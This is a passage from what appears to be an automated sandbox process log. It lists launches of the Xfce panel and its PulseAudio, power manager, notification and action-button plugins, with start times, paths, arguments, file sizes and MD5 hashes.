                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/bin/xfce4-panel
                                                          Arguments:-
                                                          File size:375768 bytes
                                                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                          Start time (UTC):05:23:41
                                                          Start date (UTC):02/01/2024
                                                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                                          File size:35136 bytes
                                                          MD5 hash:ac0b8a906f359a8ae102244738682e76